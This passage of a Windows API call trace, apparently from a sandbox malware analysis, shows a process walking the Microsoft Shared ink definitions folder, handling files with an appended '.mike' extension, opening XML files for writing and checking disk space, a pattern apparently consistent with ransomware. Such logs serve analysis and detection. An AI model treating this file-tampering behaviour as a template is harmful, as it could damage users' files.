nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.507] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe552c980, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe552c980, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f0)) returned 1 [0045.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.507] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2133340 | out: lpFileInformation=0x2133340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe552c980, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe552c980, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f0)) returned 1 [0045.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.508] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.508] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", dwFileAttributes=0x80) returned 0 [0045.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.509] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe552c980, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe552c980, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f0)) returned 1 [0045.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.509] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike")) returned 1 [0045.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", lpFilePart=0x0) returned 0x40 [0045.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\", lpFilePart=0x0) returned 0x41 [0045.510] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe552c980, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5552ae0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe552c980, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5552ae0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="main", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.xml", cAlternateFileName="")) returned 1 [0045.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f80cbd1, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f80cbd1, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f832d2f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad", cAlternateFileName="OSKNUM~1")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdb3fc5, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdb3fc5, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdb3fc5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0045.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0045.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols", cAlternateFileName="")) returned 1 [0045.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0045.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="web", cAlternateFileName="")) returned 1 [0045.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="web.xml", cAlternateFileName="")) returned 1 [0045.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="web.xml", cAlternateFileName="")) returned 0 [0045.513] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0045.513] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpFilePart=0x0) returned 0x47 [0045.513] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0045.513] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.514] CoTaskMemFree (pv=0x4fe370) [0045.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpFilePart=0x0) returned 0x47 [0045.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0045.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", lpFilePart=0x0) returned 0x47 [0045.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\", lpFilePart=0x0) returned 0x48 [0045.514] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0045.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0045.556] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0045.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0045.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.557] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.557] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.600] GetFileType (hFile=0x264) returned 0x1 [0045.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.600] GetFileType (hFile=0x264) returned 0x1 [0045.600] CloseHandle (hObject=0x264) returned 1 [0045.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpFilePart=0x0) returned 0x53 [0045.601] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.601] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.601] SetThreadErrorMode 